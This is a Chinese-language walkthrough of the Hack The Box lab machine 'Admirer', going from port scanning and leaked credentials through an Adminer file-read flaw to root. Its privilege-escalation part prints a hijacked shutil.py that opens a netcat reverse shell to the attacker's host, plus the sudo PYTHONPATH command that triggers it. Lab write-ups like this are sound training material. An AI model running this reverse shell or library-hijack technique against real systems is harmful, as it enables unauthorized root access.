Recon

Nmap Scan

[toc]没有开放太多端口,全端口扫描结果相同,开放FTB SSH和WEB三个端口。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
# Nmap 7.80 scan initiated Thu May 21 09:18:38 2020 as: nmap -sC -sV -oN nmap/initial -v 10.10.10.187
Nmap scan report for 10.10.10.187
Host is up (0.35s latency).
Not shown: 997 closed ports
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
22/tcp open  ssh     OpenSSH 7.4p1 Debian 10+deb9u7 (protocol 2.0)
| ssh-hostkey: 
|   2048 4a:71:e9:21:63:69:9d:cb:dd:84:02:1a:23:97:e1:b9 (RSA)
|   256 c5:95:b6:21:4d:46:a4:25:55:7a:87:3e:19:a8:e7:02 (ECDSA)
|_  256 d0:2d:dd:d0:5c:42:f8:7b:31:5a:be:57:c4:a9:a7:56 (ED25519)
80/tcp open  http    Apache httpd 2.4.25 ((Debian))
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
| http-robots.txt: 1 disallowed entry 
|_/admin-dir
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Admirer
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Thu May 21 09:19:00 2020 -- 1 IP address (1 host up) scanned in 22.11 seconds

FootHold

在Web端口下发现有robot.txt 检查后里面暴力一个文件夹admin-dir,实用工具爆破以后得到以下结果。

1
2
3
4
5
6
[403]   http://10.10.10.187/admin-dir/.htaccess
[403]   http://10.10.10.187/admin-dir/.htpasswd
[403]   http://10.10.10.187/admin-dir/.htpasswd.txt
[403]   http://10.10.10.187/admin-dir/.htaccess.txt
[200]   http://10.10.10.187/admin-dir/credentials.txt
[200]   http://10.10.10.187/admin-dir/contacts.txt

在credentials.txt里发现ftp的用户名和密码

1
2
3
4
5
6
7
8
9
10
11
[Internal mail account]
w.cooper@admirer.htb
fgJr6q#S\W:$P

[FTP account]
ftpuser
%n?4Wz}R$tTF7

[Wordpress account]
admin
w0rdpr3ss01!

使用用户名和密码登陆后,获取到网站备份的源码,以及一份sqldump文件[没啥用]。在Web源码中的index.php内发现用户名和密码,尝试登录ssh,结果无法登录。 同时在web源码内发现目录utility-scripts,访问提示403。由于该目录内均为php脚本,之后再次使用工具对该目录进行爆破。结果如下:

1
2
3
4
5
6
7
[403]   http://10.10.10.187/utility-scripts/.htaccess.php
[403]   http://10.10.10.187/utility-scripts/.htpasswd.php
[403]   http://10.10.10.187/utility-scripts/.htpasswd
[200]   http://10.10.10.187/utility-scripts/phptest.php
[200]   http://10.10.10.187/utility-scripts/info.php
[200]   http://10.10.10.187/utility-scripts/adminer.php
[403]   http://10.10.10.187/utility-scripts/.htaccess

User.txt

检查adminer.php后发现,版本4.6.2存在一个严重的漏洞Link Here,允许玩家绕过身份验证,读取任意文件。 具体的实现过程为: 1. 在本机启用Mysql服务,并对公网开放[0.0.0.0] 2. 使用adminer.php登录进你本机的数据库 3. 按照文章末尾的提示操作

完成后得到目前web中index.php中的用户名和密码

1
2
3
$username = "waldo";
$password = "&<h5b~yK3F#{PaPB&dA}{H>";
$dbname = "admirerdb";

使用ssh登录后获得 user.txt

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
~/Documents/HTB/Admirer root@kali
❯ ssh waldo@10.10.10.187
waldo@10.10.10.187's password: 
Linux admirer 4.9.0-12-amd64 x86_64 GNU/Linux

The programs included with the Devuan GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Devuan GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
You have new mail.
Last login: Thu May 21 14:11:59 2020 from 10.10.15.10
waldo@admirer:~$ cat user.txt 
40671a712c266c8aa563a475533bfc06

Privilege Escalation

root.txt

在之前的utility-scripts中,查看源码发现存在一个admin_tasks.php,其中执行了/opt/scripts/admin_tasks.sh。该目录成为提权的关键点。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
<html>
<head>
  <title>Administrative Tasks</title>
</head>
<body>
  <h3>Admin Tasks Web Interface (v0.01 beta)</h3>
  <?php
  // Web Interface to the admin_tasks script
  //
  if(isset($_REQUEST['task']))
  {
    $task = $_REQUEST['task'];
    if($task == '1' || $task == '2' || $task == '3' || $task == '4' ||
       $task == '5' || $task == '6' || $task == '7')
    {
      /***********************************************************************************
         Available options:
           1) View system uptime
           2) View logged in users
           3) View crontab (current user only)
           4) Backup passwd file (not working)
           5) Backup shadow file (not working)
           6) Backup web data (not working)
           7) Backup database (not working)

           NOTE: Options 4-7 are currently NOT working because they need root privileges.
                 I'm leaving them in the valid tasks in case I figure out a way
                 to securely run code as root from a PHP page.
      ************************************************************************************/
      echo str_replace("\n", "<br />", shell_exec("/opt/scripts/admin_tasks.sh $task 2>&1"));
    }
    else
    {
      echo("Invalid task.");
    }
  }
  ?>

  <p>
  <h4>Select task:</p>
  <form method="POST">
    <select name="task">
      <option value=1>View system uptime</option>
      <option value=2>View logged in users</option>
      <option value=3>View crontab</option>
      <option value=4 disabled>Backup passwd file</option>
      <option value=5 disabled>Backup shadow file</option>
      <option value=6 disabled>Backup web data</option>
      <option value=7 disabled>Backup database</option>
    </select>
    <input type="submit">
  </form>
</body>
</html>

sudo -l 发现我们可以以管理员身份执行admin_tasks.sh,查看该脚本,其中调用了同目录下的一个Python文件backup.py。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
waldo@admirer:/opt/scripts$ cat admin_tasks.sh
#!/bin/bash
......
......
backup_web()
{
    if [ "$EUID" -eq 0 ]
    then
        echo "Running backup script in the background, it might take a while..."
        /opt/scripts/backup.py &
    else
        echo "Insufficient privileges to perform the selected operation."
    fi
}

其中使用了shutil中的make_archive函数。随即想到python库劫持,可在当前文件夹下没有写入权限。

1
2
3
4
5
6
7
8
9
10
11
12
#!/usr/bin/python3

from shutil import make_archive

src = '/var/www/html/'

# old ftp directory, not used anymore
#dst = '/srv/ftp/html'

dst = '/var/backups/html'

make_archive(dst, 'gztar', src)

在论坛老哥的提示下,知道了正确劫持的的语法,将以下python命名为shutil.py,保存在/dev/shm中。

1
2
3
4
5
6
import os

def make_archive(a,b,c):
    cmd = "bash -c 'nc -e /bin/sh 10.10.14.105 1337'"
    os.system(cmd)
make_archive(1,2,3)

按照下列语法执行sh脚本,获得shell。

1
sudo PYTHONPATH="/dev/shm" /opt/scripts/admin_tasks.sh
1
2
3
4
5
6
7
8
9
10
11
12
13
~/Documents/HTB/Admirer root@kali 2m 30s
❯ nc -nlvp 1337
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::1337
Ncat: Listening on 0.0.0.0:1337
Ncat: Connection from 10.10.10.187.
Ncat: Connection from 10.10.10.187:36578.
id
whoami
uid=0(root) gid=0(root) groups=0(root)
root
cat ~/root.txt
6d0eef21434772d8c61fc3c03c2a093d